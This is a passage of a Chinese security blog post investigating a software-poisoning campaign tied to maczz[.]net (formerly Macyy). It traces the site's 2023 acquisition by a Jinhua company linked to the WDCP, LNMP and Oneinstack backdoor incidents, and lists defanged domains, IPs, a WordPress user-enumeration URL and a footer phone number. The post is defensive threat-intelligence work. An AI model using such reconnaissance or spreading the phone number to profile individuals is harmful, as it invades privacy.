src="https://wechat2rss.xlab.app/img-proxy/?k=909f3da2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9kzvUvFNqq15by4ia9uSbX45zzy38kYhqNy83PMMgZPlaTGorcKfo2Vw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">还有个别的软件使用了阿里云的OSS，但是软件包不存在，不知道是否是配置问题</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100001523" data-ratio="0.3415977961432507" data-s="300,640" type="block" data-type="png" data-w="2178" src="https://wechat2rss.xlab.app/img-proxy/?k=f05279d4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9JbQXE5IScrfVAG8rmlju4o8pibuQMEa1SAaMbp7AnbCJcf8kAWme5fw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">投毒之前被收购</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">目前的 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">maczz[.]net</span></code><span leaf=""> 是个wordpress程序，根据api可以看到网站共有10个有公开内容的用户。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://maczz[.]net/wp-json/wp/v2/users/?per_page=100&amp;page=1" target="_blank">https://maczz[.]net/wp-json/wp/v2/users/?per_page=100&amp;page=1</a></span></code></p><p><img class="rich_pages wxw-img" data-imgfileid="100001524" data-ratio="0.46566692975532753" data-s="300,640" type="block" data-type="png" data-w="2534" src="https://wechat2rss.xlab.app/img-proxy/?k=af349467&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9kheq39rWKALVbWh4PnXdoR10LyibiaIpPCXOJfvYicE4hPC61pAnmn3TA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而这10个用户基本上都上传了部分程序，感觉上有点像是站长的障眼法，让网站看上去像是多个用户贡献了资源（或者也许以前的 macyy 就是这样的？）。</span></p><p><img data-imgfileid="100001525" class="rich_pages wxw-img" data-ratio="0.4075895994378074" data-s="300,640" data-type="png" data-w="2846" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6816af82&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9dlT09LAIrzvpUs0tCdJynU6EOrs4yorAqiarvT2rnc5WicHpccWAN2icg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001527" class="rich_pages wxw-img" data-ratio="0.4049531459170013" data-s="300,640" data-type="png" data-w="2988" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5c737e56&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9cQQzFhMSSQ7r5fTS6c2iagOG2d7kR0D94ql3VjIVTbMBRbzFN80n67Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">仔细看了下 10 个账号中能够追溯到真人的信息，个人感觉不太像是攻击者本人参与就没有再深入跟进。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是在看wordpress用户的时候发现评论区有用户骂人，说网站是有交流群的。</span></p><p><img data-imgfileid="100001526" class="rich_pages wxw-img" data-ratio="0.43509865005192105" data-s="300,640" data-type="png" data-w="1926" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=794b86ab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9r1lsmkCQ5sfhkbibHcZObktGa9icuhPicQ46exgFfQCXSVXZLqibLuoUfg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">找到群聊入口，加群看看。<img data-imgfileid="100001528" class="rich_pages wxw-img" data-ratio="0.24169184290030213" data-s="300,640" data-type="png" data-w="1986" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6919e5bf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY99j6YMUXWcvxWvBq0OiaS9vzT7b6K5cia9Vt4AKXYzcM4l6f8gVYtj3cA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">按加群时间排序，最早加群的人的时间是 2022年9月18日。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这引起了我的疑惑，如果网站是从一开始建立就打算拿来投毒，会提前这么久就开始做准备么？是从别人手里买来的？</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">最早一批群成员分析过程略。</span><span leaf=""><br/></span><span leaf=""><br/></span><span leaf="">QQ号部分简单分析了一下进群最早的一批人，没有发现有共同群聊的人，倒是有一个哥们打了一个 “安全” 标签，不过也说明不了什么。</span><span leaf=""><br/></span><span leaf="">现在群主是2023年4月份入群的，QQ号是买来的靓号，关联的信息都是老旧信息。</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在归档网站搜了下，发现原来网站确实是2022年就创建了，而且确实是免费的</span></p><p><img data-imgfileid="100001529" class="rich_pages wxw-img" data-ratio="0.39425837320574164" data-s="300,640" data-type="png" data-w="2090" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=48a94503&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9fTyv7rsXnboSZrenVQhIya1Yg2E8wibHxDvznAemJIDuafEmcbaceVA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在23年初有过一次 &#34;网站所有权转让&#34; 通告。</span></p><p><img data-imgfileid="100001530" class="rich_pages wxw-img" data-ratio="0.47432550043516103" data-s="300,640" data-type="png" data-w="2298" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=57c66ef3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9ibe6ovbEyWNBW2BSCcciah0xp1icTLzWpxcFlGBkb9XXltWPekhGiccVcg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001531" class="rich_pages wxw-img" data-ratio="0.4521232306411324" data-s="300,640" data-type="png" data-w="2402" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=fcd1b846&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9tdQ5tlTrHePlBMiaWxQfWCOCho9gFT3Ch9ia8MQxjgcPP3mxeYFfDFtA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">看上去是被收购了。</span></p><p><img data-imgfileid="100001532" class="rich_pages wxw-img" data-ratio="0.5204918032786885" data-s="300,640" data-type="png" data-w="2928" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=727cad50&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9YZxulE8YCY6S8MIZic4mC9ypmClEgzFtXmo6MpPqzlkGrGthT4AULsg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">根据快照对比来看，2023年初发布网站被收购公告之后软件资源一直没有更新，一直到23年的9月底网页发生了变动。</span></p><p><img data-imgfileid="100001535" class="rich_pages wxw-img" data-ratio="0.43372093023255814" data-s="300,640" data-type="png" data-w="3440" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=558c50d4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY99y1EzQoEV2ot9js1PN4YWf0PmHhEGAA5hJ8RnqlJHccywYrTIGw8Aw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001533" class="rich_pages wxw-img" data-ratio="0.21549966009517335" data-s="300,640" data-type="png" data-w="2942" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=29ee6b74&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9crc8QGRjgWytJGqtKasCj5ibZDNYB77ibtO622hhezqAk3BQ5FLCIibJA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">9月底网站首页的轮播图变成6张，网站底部开始出现收购公司信息。</span></p><p><img data-imgfileid="100001539" class="rich_pages wxw-img" data-ratio="0.4726107226107226" data-s="300,640" data-type="png" data-w="3432" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=3ca278cb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY938FJEZkupVQrerxPA92Uib4veic1X0fQhwBnq9xxW30llRvuG6tOq6yA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001534" class="rich_pages wxw-img" data-ratio="0.23288637967537051" data-s="300,640" data-type="png" data-w="2834" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=1b3fc3af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9PN5BIR2XiaoHibOQSyBwcGQOUhAW5wSd8Aj7KU1JJLqY390ia6asmpYpQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">并且贴心的增加了 &#34;服务器运维&#34; 板块🐶。</span></p><p><img data-imgfileid="100001536" class="rich_pages wxw-img" data-ratio="0.575" data-s="300,640" data-type="png" data-w="1280" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=cffb958c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9Nh1q5L0dicdqEMjsx2n9uGD85mvEpVXDtbrLOq6nGL22uc9o5H3nr3w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个 &#34;服务器运维&#34; 版块下的工具开始逐渐跟 &#34;安全绘景&#34; 的那篇文章对应上了。</span></p><p><img data-imgfileid="100001537" class="rich_pages wxw-img" data-ratio="0.6105563480741797" data-s="300,640" data-type="png" data-w="2804" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=11b1c369&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY969a8snQ2fG2DiangTdvTANVJ104EibyZSVywBTOu4ywVdR3DgQ3iaOjTw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">大格局的金华矜贵公司</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">Macyy 的网站底部有个手机号 13601819876，搜索了一下，发现老板棋局果然大。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">Macyy 直接跟 WDCP、Oneinstack 、LNMP 梦幻联动！（后来发现</span><a href="https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247521920&amp;idx=1&amp;sn=8e09a13e41334d61ff3c73f3bd169f0e&amp;scene=21#wechat_redirect" style="color: rgb(30, 107, 184);font-weight: bold;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;text-decoration-color: currentcolor;text-decoration: none;text-decoration-style: solid;text-decoration-thickness: auto;overflow-wrap: break-word;" href="https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247521920&amp;idx=1&amp;sn=8e09a13e41334d61ff3c73f3bd169f0e&amp;scene=21#wechat_redirect"><span leaf="">深信服文章</span></a><span leaf="">也有提到）</span></p><p><img data-imgfileid="100001538" class="rich_pages wxw-img" data-ratio="0.3071230342275671" data-s="300,640" data-type="png" data-w="2162" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=3c179aae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9K1oFEb8VcBLfVVib7vxG0LdDk4qaf8Gf9vVzL89jTIZfJbsoOV6a2UA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">mjj 论坛发帖怀疑，金华市矜贵网络科技公司关联 WDCP、LNMP、Oneinstack。</span></p><p><img data-imgfileid="100001541" class="rich_pages wxw-img" data-ratio="0.5913838120104439" data-s="300,640" data-type="png" data-w="3064" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2e5bc27b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9fnNXQZibTr8BrZnvvrefr9Rn7jokySn0Bq04gCv1QVsKNQ7uKg8BP7Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">楼下回复 Oneinstack 后门事件相关信息。</span></p><p><img data-imgfileid="100001540" class="rich_pages wxw-img" data-ratio="0.43655913978494626" data-s="300,640" data-type="png" data-w="2790" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2bf78fcd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY95bdGnxB5FEh5TJK6TEgm867Fl07sU9lbYAF0ic7DJ7M38Vm51kYK8tA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">似乎在23年的4月份 Oneinstack 就出现过挂马事件 <a href="https://github.com/oneinstack/oneinstack/issues/487。" target="_blank">https://github.com/oneinstack/oneinstack/issues/487。</a></span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">用户责问作者现在对项目域名还有没有掌控权，作者支支吾吾重复了金华市矜贵网络科技公司忽悠他的话，说收购他是为了跟宝塔竞争云云。</span></p><p><img data-imgfileid="100001542" class="rich_pages wxw-img" data-ratio="0.5762331838565022" data-s="300,640" data-type="png" data-w="2676" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=16016fd7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9lOuKxcgown4fEspRGtG6IibZvbNo1shnr5YnwFkpG36YqCNbsnTicRLg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">第五次定性转折 - 专业团队？</span></span><span style="display: none;"></span></h5><h6 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 14px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">招聘广告</span></span><span style="display: none;"></span></h6><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">maczz[.]net</span></code><span leaf=""> 当前解析为阿里云 8.217.16.200，2024/02/06 解析到美国 23.225.213.107。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">信息搜集发现关联出一个 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">mackk[.]cc</span></code><span leaf="">（备用方案？） 当前解析IP为 23.225.213.107，2024/02/06 解析到过阿里云的 IP 8.217.16.200。</span></p><p><img data-imgfileid="100001543" class="rich_pages wxw-img" data-ratio="0.2303370786516854" data-s="300,640" data-type="png" data-w="1780" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=eb190e48&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY92ZTbmoKwhqvfNrPEvZb18uCwgR7XyeCibmBpP7ebGE1klmBjnKscffw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 